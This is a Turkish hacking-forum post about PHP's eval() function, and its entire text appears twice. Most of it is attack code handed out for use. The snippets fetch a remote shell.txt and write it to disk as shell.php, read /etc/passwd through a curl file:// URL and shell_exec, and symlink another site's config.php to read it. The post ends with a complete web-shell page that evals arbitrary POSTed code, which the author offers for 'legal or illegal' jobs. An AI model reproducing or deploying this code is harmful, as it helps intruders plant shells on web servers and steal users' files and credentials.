11-03-2023 Saat 23:50
PHP EVAL NEDİR ?
eval(); bir php fonksiyonudur , ancak onu diğerlerinden ayıran şey hacking alanında çok sık kullanılmasıdır . Bu yüzden kendisine webmaster dünyası evilyani zararlı,kötü fonksiyon lakabı takılmıştır.
eval(); ın görevi herhangi bir metni php olarak yorumlamasıdır , zaten bu yüzden hackerler tarafından birçok alanda kullanılır , olup olmadık zarar verebilecek kodları php olarak yorumlatıp sisteme sızılmasını sağlar.
include komutuna benzerlik gösterir , ve sırf bu yüzden bile dikkatli kullanılması ve kodlanması gereklidir , yoksa sitenizin her tarafına include eder gibi dosya yüklerler.
Mesala aşağıdaki base64 ile şifrelenmi kodları php olarak yorumlatır , yani hiçbir şekilde sorgusuz sualsiz !
Kod:
eval(base64_decode('ykpJHM9cHJl.....')
PHP nin birçok güvenlik taramasından'da hesap vermeden geçebilir , birçok hazır cms,forum scriptide bolca eval(); fonksiyonu kullanmaktadır , yani yasaklanması gibi bir durum söz konusu olamaz php için.
Eval içinde çalıştırılan bu basit kodlama bulunduğunuz dizine kolaylıkla shell yüklemenizi sağlar
Kod:
$z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://www.website.com/shell.txt"));fclose($z);
Eval içinde çalıştırılan bu CURL düzeneği ise etc/passwd komutunu rahatça çalıştırır , %99 ihtimal ile çalıştırır.
Kod:
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:file:///etc/passwd");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
Eval içinde Symlink'de çalıştırabilirsiniz
Kod:
$hedef = '/home/spyhackerz.com/public_html/config.php';
$bağ = '/home/hfgk/public_html/sym/config.ini';
symlink($hedef, $bağ);
echo(readlink($bağ));
Çalıştırabileceğiniz diğer örnek komutlar , genelde kullandığım kendi deneme yanılmam ile yaptığum düzenlemelerdir.
Kod:
$output = shell_exec('cat /etc/passwd > passwd.txt');
$output = shell_exec('ls /var/mail > users.txt');
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."n";
}
Her türlü php kodlarınızı eval içinde okutabilirsiniz başına sonuna php taglarınızı eklemeden <?php ?> gibi..
Şimdi Eval çalıştırabileceğin betiğide hazırladım , eval ile yapacağınız legal,illegal işlerinizde tek parça olarak kullanabilirsiniz.
Kod:
<?php
echo "<center><a href='?id=eval'>Eval bypass tiktik</a></center>";
// PHP Eval komut bölümü
if ($_GET[id]=="eval"){
$code=stripslashes($_POST['code']);
echo '<center><br><h3> Eval PHP</h3></center>
<center>
<form method="POST" action="">
<input type="hidden" name="id" value="eval">
<textarea name ="code" rows="10" cols="85" class="textarea">',$code,'
Kodlar buraya gelsin..
</textarea><br><br>
<input type="submit" value=" Evaluate PHP Code" class="button"><hr>
</form>
<textarea rows="10" cols="85" class="textarea">';
eval($code);
echo '</textarea><br><br>';
}
?>
eval(); bir php fonksiyonudur , ancak onu diğerlerinden ayıran şey hacking alanında çok sık kullanılmasıdır . Bu yüzden kendisine webmaster dünyası evilyani zararlı,kötü fonksiyon lakabı takılmıştır.
eval(); ın görevi herhangi bir metni php olarak yorumlamasıdır , zaten bu yüzden hackerler tarafından birçok alanda kullanılır , olup olmadık zarar verebilecek kodları php olarak yorumlatıp sisteme sızılmasını sağlar.
include komutuna benzerlik gösterir , ve sırf bu yüzden bile dikkatli kullanılması ve kodlanması gereklidir , yoksa sitenizin her tarafına include eder gibi dosya yüklerler.
Mesala aşağıdaki base64 ile şifrelenmi kodları php olarak yorumlatır , yani hiçbir şekilde sorgusuz sualsiz !
Kod:
eval(base64_decode('ykpJHM9cHJl.....')
PHP nin birçok güvenlik taramasından'da hesap vermeden geçebilir , birçok hazır cms,forum scriptide bolca eval(); fonksiyonu kullanmaktadır , yani yasaklanması gibi bir durum söz konusu olamaz php için.
Eval içinde çalıştırılan bu basit kodlama bulunduğunuz dizine kolaylıkla shell yüklemenizi sağlar
Kod:
$z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://www.website.com/shell.txt"));fclose($z);
Eval içinde çalıştırılan bu CURL düzeneği ise etc/passwd komutunu rahatça çalıştırır , %99 ihtimal ile çalıştırır.
Kod:
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:file:///etc/passwd");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
Eval içinde Symlink'de çalıştırabilirsiniz
Kod:
$hedef = '/home/spyhackerz.com/public_html/config.php';
$bağ = '/home/hfgk/public_html/sym/config.ini';
symlink($hedef, $bağ);
echo(readlink($bağ));
Çalıştırabileceğiniz diğer örnek komutlar , genelde kullandığım kendi deneme yanılmam ile yaptığum düzenlemelerdir.
Kod:
$output = shell_exec('cat /etc/passwd > passwd.txt');
$output = shell_exec('ls /var/mail > users.txt');
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."n";
}
Her türlü php kodlarınızı eval içinde okutabilirsiniz başına sonuna php taglarınızı eklemeden <?php ?> gibi..
Şimdi Eval çalıştırabileceğin betiğide hazırladım , eval ile yapacağınız legal,illegal işlerinizde tek parça olarak kullanabilirsiniz.
Kod:
<?php
echo "<center><a href='?id=eval'>Eval bypass tiktik</a></center>";
// PHP Eval komut bölümü
if ($_GET[id]=="eval"){
$code=stripslashes($_POST['code']);
echo '<center><br><h3> Eval PHP</h3></center>
<center>
<form method="POST" action="">
<input type="hidden" name="id" value="eval">
<textarea name ="code" rows="10" cols="85" class="textarea">',$code,'
Kodlar buraya gelsin..
</textarea><br><br>
<input type="submit" value=" Evaluate PHP Code" class="button"><hr>
</form>
<textarea rows="10" cols="85" class="textarea">';
eval($code);
echo '</textarea><br><br>';
}
?>